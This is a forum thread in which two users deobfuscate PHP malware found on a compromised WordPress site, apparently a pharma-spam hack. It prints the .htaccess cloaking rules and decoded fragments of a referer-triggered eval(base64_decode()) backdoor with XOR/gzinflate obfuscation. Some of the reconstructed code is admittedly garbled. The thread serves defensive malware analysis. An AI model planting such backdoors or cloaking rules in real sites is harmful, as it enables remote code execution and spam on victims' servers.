script analysis anyone?

[bad_brain]

if anyone of you is bored or is simply up for a little challenge have a look at the script attached.
found it on a customer site I am re-doing, I am not sure what it is doing and I also have no time to analyze it.....mab converted some of the hex in it though and it's malicious with a 99.9999999% chance.

what makes it interesting is the effort that was obviously out into it by using base64 AND hex, additionally there's an odd rewrite rule placed in the .htaccess which I never have seen before in context with such scripts:

RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|ANTIPIDERSIA) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol)
RewriteRule ^([^/]*)/$ /main.php?p=$1 [L]

[lilrofl]

I can't download the file on this machine, but I will totally take a look at it. Preliminarily it looks like an implementation of the wordpress pharma hacks.

Traditionally pharma works like:

A conditional redirect is added based on the user agent or user referrer. Many times there is an included rewrite condition as well by file extension like:

Code: Select all

RewriteCond %{REQUEST_FILENAME} (shtml|html|htm|php|xml|phtml|asp|aspx)$ [NC] 

The redirection is to a php script, main.php in this case which will receive the requested information and the URL of the requested information.

Main.php then opens the requested URL and reads it. If main.php finds appropriate html tags to add the spammy payload (found in main.php) it does so.

[bad_brain]

nice...
I have to admit I usually don't really check the background of such scripts when I find them on customer sites (sites of customers that just started to work with me that is, sites I take care of already usually don't run on a 2 year old Wordpress 3.3.1 install like this one ).

this one caught my attention though because it differs from the usual plain text eval(base64_decode( crap, the encryption/encoding makes it more sneaky and "professional".

[lilrofl]

I worked on it for a while, it's a base64_decode nightmare lol.

You are totally right, it is super hard to hide the eval(base64_decode( portion of PHP malware, this does so with:

Code: Select all

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x62\x61\x73\x65\x36\x34\x5F\
x64\x65\x63\x6F\x64\x65\x28

which translated out of hexadecimal is:

Code: Select all

preg_replace(“/.*/e”,”eval(base64_decode(”

the /e in preg_replace has been depreciated and will usually throw an error, except for

Code: Select all

error_reporting(0)

If you break the gibberish at the preg_replace bit and attack the middle gibberish, which we know is base64, you two new nested functions which factor down to three others:

Code: Select all

$xtDE4yoxcmQ4S=base64_decode("YmFzZTY0X2RlY29kZQ==");
//decodes to base64_decode
	$xjQCBpbTLvuG=base64_decode("c3RybGVu");
//decodes to strlen
	$xmqSEAfSt8Y=base64_decode("Y2hy");
//decodes to chr
	$xDjQUHQSNMUgk=base64_decode("b3Jk");
//decodes to ord
	$x3U9UcEzb5Ar=base64_decode("Z3ppbmZsYXRl");
//decodes to gzinflate

and

Code: Select all

$xWvIIZlBP5yOi=$x3U9UcEzb5Ar($xtDE4yoxcmQ4S($xWvIIZlBP5yOi));
$xUYZ0h2knwt1F=$xjQCBpbTLvuG($xWvIIZlBP5yOi);

and we'll do the third one in a bit.

We can use the equivalence of the first expression to clean up the second one here:

Code: Select all

xWvIIZlBP5yOi=gzinflate(base64_decode($xWvIIZlBP5yOi));
$xUYZ0h2knwt1F=base_64_decode($xWvIIZlBP5yOi);

Code: Select all

$xWvIIZlBP5yOi

is the function declared at the beginning of main.php, and we know now that it is encoded with gzdeflate and base64. I'll refer to this variable as dumbFunction, the main snippet of which is:

Code: Select all

parse_str($_SERVER['HTTP_REFERER'], $a);
if (reset($a) == '12' && count($a) == 9) {
    echo '<3456>';
    eval(base64_decode(str_replace(" ", "+", 
join(array_slice($a, count($a) - 3)))));
    echo '</3456>';

We have one more chunk of base64 gibberish from the nested bit above:

Code: Select all

$xxFOLVezAyy='';for($xy2iVzhaTrUdw=0;
$xy2iVzhaTrUdw<$xUYZ0h2knwt1F;$xy2iVzhaTrUdw++){$xxFOLVezAyy.=$xmqSEAfSt8Y(($xDjQUHQSNMUgk($xWvIIZlBP5yOi[$xy2iVzhaTrUdw])
^1310981518));}
eval($xxFOLVezAyy);

after cleaning that up with generic transpositions it looks something like:

Code: Select all

$a= ‘’;
	for($b=0,$b<$c,$b++) {
		$a=chr((ord(dumbFunction[$b])^1310981518))
;}
eval($a);

(forgive me my formatting, I don't work in php much these days)

and this is about where I hit my brick wall. I had intended to find the spammy bit that I expected to be added to legitimate links, which I have not. I either overlooked some base64 in that rats nest, or perhaps the chr((ord(dumbFunction[$b])^1310981518)) bit constructs a string to be added.

anyhow, it's super early so I'm going to grab some breakfast maybe I'll get back to this in the afternoon, or maybe someone else will have some insight on it

[lilrofl]

I was going to fix my formatting so it didn't go off the page... but the edit tab is in the off the page bits

[bad_brain]

wow, nice work bud!
and yeah, it IS hard to analyze, but you did really well so far....I spoke to the customer and she told me they knew the site was compromised but she thought it's fixed by her (former) "IT person". it seems all that was done was to remove the includes in the WP files (at least the variable in the malware script wasn't passed anywhere)...but then: script left online and WP not updated because "some plugins are incompatible"....

[lilrofl]

I found an error I made my original breakdown which led me to this formatting instead of the previous. I'm still not exactly sure what I'm looking at, but it still looks to be reformatting by letter the http_referer. I still expected to see some spammy link in there somewhere but such is life

Code: Select all

<?php
Error_reporting(0);

$badFunction=
	ini_set('error_log', '/dev/null');
	parse_str($_SERVER['HTTP_REFERER'], $a);
	if (reset($a) == '12' && count($a) == 9) {
    	echo '<3456>';
    	str_replace(" ", "+", join(array_slice($a, count($a) - 3))));
    	echo '</3456>';
	}

$lengthURL=strlen($badFunction);
$array='';
preg_replace(“/.*/e”,”
	for($i=0; $i<$lengthURL; $i++) {
		$array.=chr((ord($badFunction[$i])^1310981518));
	};
”,”.”);
eval($array);

return;
?>